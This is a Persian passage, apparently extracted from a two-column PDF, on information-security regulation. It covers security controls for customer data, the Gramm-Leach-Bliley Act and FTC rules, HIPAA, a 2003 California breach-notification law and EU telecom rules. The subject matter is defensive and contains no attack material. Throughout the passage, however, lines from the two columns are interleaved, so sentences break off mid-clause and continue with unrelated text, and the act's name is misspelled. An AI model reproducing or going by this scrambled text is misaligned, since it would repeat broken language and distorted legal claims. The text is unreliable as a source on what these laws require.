ﺧﺮﻳﺪﺍﺭﺍﻥ ﻭ ﺳﺎﻳﺮ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻨﺘﺮﻝ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ. ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺳﻴﺴﺘﻢ ﮔﺎﻡ ﺑﺮﺩﺍﺭﻧﺪ؛
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻃﺮﺍﺣـﻲ ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻭﻟﻴﻪ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ﺑﺎﻳـﺪ •
ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺎ ﺣــﺴﺎﺳﻴﺖ ،ﭘﻴﭽﻴــﺪﮔﻲ ،ﻭ ﺣــﻮﺯﺓ ﺗﺄﺛﻴﺮﮔــﺬﺍﺭﻱ ﻓﻮﺭﹰﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻤﻴﻦ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ ﻣﺘﻨﺎﺳﺐ ﻫـﺴﺘﻨﺪ .ﺑـﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﻪ ﺩﺳـﺘﺔ ﺣﺪ ﻭﺳﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ؛
ﻭﺳﻴﻌﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺑﻜﺎﺭ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺩﺭ ﻣﻴـﺎﻥ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﺍﺧﻠـﻲ ﻭ •
ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﺧﺎﺭﺟﻲ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻴـﺎﻥ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ
ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ • ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﺠﺰﺍ ﻫﺴﺘﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ؛ ﻭ
)ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ(؛ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺎﻳﺪ ﻧﺼﺐ ﻭ ﺍﺟﺮﺍ ﮔﺮﺩﻧﺪ. •
ﻣﺤﺪﻭﺩﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛ •
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ؛ • ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﭘﻴﺶ ﮔﺮﻓﺘﻪ ﻛﻪ ﺑﺮ ﻓﺮﺁﻳﻨﺪﻫﺎ
ﺗﻐﻴﻴﺮ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ؛ • ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﻭ ﻧﻪ ﺑﺮ ﺷﻴﻮﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗـﺎﻧﻮﻥ
٩٥
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻭﮔﺎﻧﻪ )ﺳﻴﺎﺳﺖ ﺟﺪﺍﺳﺎﺯﻱ ﻭﻇﺎﻳﻒ • ﻣﺪﺭﻥﺳﺎﺯﻱ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ )ﻣـﺼﻮﺏ ﺳـﺎﻝ ۱۹۹۹؛ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ
Gramm - Leach - Biley ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﺻـﻠﻲ ﺁﻥ ﺩﺭ ﻛﻨﮕـﺮﻩ ،ﻣـﺼﻮﺑﺔ
ﻭ ﺑﺮﺭﺳــﻲ ﺳــﻮﺍﺑﻖ( ﺑــﺮﺍﻱ ﻛﺎﺭﻣﻨــﺪﺍﻧﻲ ﻛــﻪ ﺑــﻪ ﺍﻃﻼﻋــﺎﺕ
ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ "ﻫﺮ ﻣﺆﺳﺴﻪ ﻣـﺎﻟﻲ ﻣـﺴﺌﻮﻟﻴﺖ
ﺧﺮﻳﺪﺭﺍﻥ ،ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ؛
ﻣﺪﺍﻭﻣﻲ ﺑﺮﺍﻱ ﺍﺣﺘﺮﺍﻡ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻧﻔﻮﺫ٩٦؛ •
ﺑﺎﻳﺪ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻭ ﻏﻴﺮﻋﻤـﻮﻣﻲ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻧﻔﻮﺫ٩٧؛ ﻭ •
ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻛﻨﺪ ".ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ،ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ
ﭘﻴﺶﺑﻴﻨـﻲ ﺗـﺪﺍﺑﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﺨﺮﻳـﺐ، •
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺗـﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻣـﺪﻳﺮﻳﺘﻲ ﻭ ﻓﻨـﻲ ﻭ
ﺩﺳﺘﻜﺎﺭﻱ ،ﻳﺎ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ.
ﻫﻤﭽﻨــﻴﻦ ﺍﻧﺠــﺎﻡ ﺣﻔﺎﻇــﺖ ﻓﻴﺰﻳﻜــﻲ ﺑــﺮﺍﻱ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻣﻲ ﺑﺎﺷﻨﺪ .ﻧﻜﺘﻪ ﻣﻬـﻢ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ ﻣـﺸﺨﺺ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ .ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺍﻳـﻦ ﻛﻨﺘﺮﻟﻬـﺎ، ﻧﻜﺮﺩﻩﺍﻧﺪ ﻛﻪ ﭼﻪ ﺍﺟﺰﺍﻱ ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻟﺬﺍ
ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ،ﺣـﺴﺎﺳﻴﺖ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻗﺎﻧﻮﻥ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﺎﺹ ﺭﺍ
ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ ،ﺗﻬﺪﻳﺪﺍﺕ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ،ﻭ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺗﻐﻴﻴﺮ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﻣﺜـﻞ ﺍﺩﻏـﺎﻡ ﻳـﺎ ﺍﺗﺤـﺎﺩ ﺑـﺎ
ﺑﺮ ﻣﺒﻨـﺎﻱ ﺍﻳـﻦ ﻗـﺎﻧﻮﻥ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣـﺼﻮﺏ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ،ﻭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺎﺭﺝ
ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﺑــﺮﺍﻱ ﺻــﻨﺎﻳﻊ ﺧــﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺗﻮﺳــﻂ ﺑﺎﻧﻜﻬــﺎ ﺍﺟــﺮﺍ
ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫﻴﺄﺕ ﻣﺪﻳﺮﺓ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ
ﻣﻲﺷﻮﻧﺪ .ﻗﺎﻧﻮﻥ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻨﻲ ﻣﻘﺘﻀﻲ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﻲ ﻛﻨﺪ ،ﺑﻠﻜﻪ
ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺘﺒﻲ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺭﺍ
ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﺑﺎﺷﺪ:
ﺗﺄﻳﻴﺪ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺮ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻃـﺮﺡ )ﺷـﺎﻣﻞ
ﻣﺴﺌﻮﻟﻴﺖ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﻭ ﺑﺮﺭﺳﻲ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ( ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ. ﻲ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟ ﹺ •
ﻗﻮﺍﻧﻴﻦ ﻣﺸﺎﺑﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺗﺠﺎﺭﺕ ﻣﻠﻲ ،ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺗﺤـﺖ ﺍﻓﺸﺎﺳﺎﺯﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺗﻐﻴﻴـﺮ ﻭ ﻳـﺎ ﺍﻧﻬـﺪﺍﻡ
ﻗﻠﻤﺮﻭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻬﻴﺔ ﻃﺮﺣﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺆﺳﺴﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺧﺮﻳـﺪﺍﺭﺍﻥ
ﺑﺎﻳﺪ: ﺍﺳﺖ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ.
ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ؛ • ﺍﺣﺘﻤﺎﻝ ﻭ ﭘﺘﺎﻧﺴﻴﻞ ﺑﻪ ﻓﻌﻠﻴﺖ ﻧﺮﺳﻴﺪﻥ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺭﺍ ﺑـﺎ •
ﺗﻮﺟﻪ ﺑﻪ ﺣﺴﺎﺳﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﺪ.
ﺍﺯ ﻫﺮ ﻛـﺎﺭﺑﺮﺩ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﻃﺒـﻖ ﺿـﺎﺑﻄﻪ • ﺩﺭ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﻋﻤﻠﻴـﺎﺗﻲ ﺷـﺮﻛﺖ ﻣﺨـﺎﻃﺮﺍﺗﻲ •
ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﻧﻴﺴﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ؛ ﻭ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ ﻣـﺸﺨﺺ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺴﺘﻢ ﻛﻨﻮﻧﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ
ﺍﺯ ﻫﻤﺎﻫﻨﮕﻲ ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ. •
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ؛
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻗﺎﺑﻞ ﺍﻧﻌﻄﺎﻑ ﺍﺳﺖ:
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﻃﺮﺍﺣﻲ ﻭ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻭ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ •
ﻣﺆﺳﺴﺎﺕ ﻣﺸﻤﻮﻝ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ • ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻭ ﺍﺻﻼﺡ ﻗﺮﺍﺭ ﺩﻫﻨﺪ؛
ﻛﻨﻨــﺪ ﺗــﺎ ﺑﻄــﻮﺭ ﻣﻨﻄﻘــﻲ ﻭ ﻣﻨﺎﺳــﺐ ﺍﻳــﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ
ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻣﻨﺎﺳﺐ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ •
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ؛
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﻧﺪ؛ ﻭ
ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ •
ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺭﺍ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭﺍﻗﻌﻲ )ﻣﺜﻞ ﺗﻐﻴﻴﺮ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ ﻋﻤﻠﻴـﺎﺕ •
ﺍﺳﺘﻔﺎﺩﻩ ﭼﻪ ﺑﺎﺷﻨﺪ ،ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ:
ﺳﺎﺯﻣﺎﻥ( ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺘـﺎﻳﺞ
oﺍﻧﺪﺍﺯﻩ ،ﭘﻴﭽﻴﺪﮔﻲ ،ﻭ ﮔﺴﺘﺮﺓ ﺁﻥ؛
oﺯﻳﺮﺳﺎﺧﺖ ﻓﻨﻲ ،ﺳـﺨﺖ ﺍﻓـﺰﺍﺭ ،ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﻣﻨﻴﺘـﻲ ﺁﺯﻣﺎﻳﺶ ،ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺭﺍ ﻧﻴﺰ ﺍﺭﺯﻳﺎﺑﻲ ﻭ ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭ؛ ﺭﻭﻳﻜﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﻴﻤـﺔ ﺧـﺪﻣﺎﺕ ﺩﺭﻣـﺎﻧﻲ
oﻫﺰﻳﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ٩٨ﺑﻪ ﭼﺸﻢ ﻣـﻲ ﺧـﻮﺭﺩ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ
oﺍﺣﺘﻤﺎﻝ ﻭ ﺣﺴﺎﺳﻴﺖ ﻫﺮﻳﻚ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ. ﺑﻬﺪﺍﺷﺘﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻛﻨﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺑﻴﻤﺎﺭ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻄﻮﺭ ﻋﻤﻮﻣﻲ ،ﺿﻌﻔﻬﺎ
ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤـﻮﺍﺭﻩ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺩﻭﺭ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ
ﻭ ﻋﻴﻮﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻋﻤﻠﻜـﺮﺩ ﺳﻴـﺴﺘﻢ ﻭ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ
ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ .ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺍﻣﻨﻴﺖ ،ﻣﻨﺘﺸﺮ ﺳـﺎﺯﻧﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ ﺍﺭﺍﺋـﻪ ﻛﻨﻨـﺪﮔﺎﻥ
ﻣﻨﺎﺳﺐ ﻭ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻫﺒﺮﻱ ،ﻓﻴﺰﻳﻜﻲ ﻭ ﻓﻨﻲ ﻫﺴﺘﻨﺪ
ﺧﺪﻣﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺸﺘﺮﻛﺎﻥ ﺭﺍ ﺍﺯ ﺧﻄﺮﺍﺗـﻲ
ﺗﺎ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﭘﺰﺷـﻜﻲ ﺍﺷـﺨﺎﺹ ﺩﺭ
ﻛﻪ ﺑﻮﺍﺳﻄﺔ ﺗﺨﻠﻒ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺷﺒﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ )ﻭ
ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺶ ﺑﻴﻨﻲﺷـﺪﻩ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ
ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺁﻥ( ﺁﮔﺎﻩ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ ﺟـﻮﻻﻱ
ﺣﻔﻆ ﺷﻮﻧﺪ .ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻭ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﻋﻤـﺎﻝ
۲۰۰۳ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﻗﺎﻧﻮﻧﻲ ﺗﺼﻮﻳﺐ ﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻫـﺮ
ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺭﺍﻱ ۲۸ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ۴۱ﺷﺮﺡ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺖ.
ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺳﺎﻛﻨﺎﻥ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ ﺭﺍ ﻧﮕﻬـﺪﺍﺭﻱ
ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ
ﻣﻲﻛﻨﺪ ،ﻣﻮﻇﻒ ﺑﻪ ﺁﮔﺎﻩ ﺳـﺎﺧﺘﻦ ﺁﻧـﺎﻥ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ
ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻓﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺛﺒﺖ ،ﻫﺰﻳﻨـﺔ ﺍﻗـﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ،
ﺣﺎﺻﻞ ﺍﺯ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺁﻥ
ﻧﻴﺎﺯ ﺁﻣﻮﺯﺷﻲ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺯﺵ ﺑﺮﺭﺳﻲ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴـﺮﻱ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ.
ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺩﺭﻧﻈﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ،
